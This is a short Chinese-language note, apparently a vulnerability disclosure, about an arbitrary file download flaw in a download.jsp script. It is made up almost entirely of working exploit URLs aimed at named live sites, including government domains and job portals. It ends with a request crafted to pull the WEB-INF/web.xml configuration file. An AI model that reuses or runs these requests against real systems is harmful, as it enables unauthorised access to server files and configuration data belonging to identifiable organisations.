任意文件下载的链接
http://www.lhjy.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp
http://www.zjdeqing.lm.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp
http://www.lhrlzyw.com/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp
http://www.dqlm.com/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp
http://www.fzjob.net:9090/tabledownload/download.jsp?url=Dredboy5711%5Cjxfzweb%5Ctabledownload%5C&id=&filename=download.jsp
download.jsp没有做任何的判断和过滤导致任意文件下载
我再下个web.xml试试
http://www.fzjob.net:9090/tabledownload/download.jsp?url=Dredboy5711%5Cjxfzweb%5CWEB-INF%5C&id=&filename=web.xml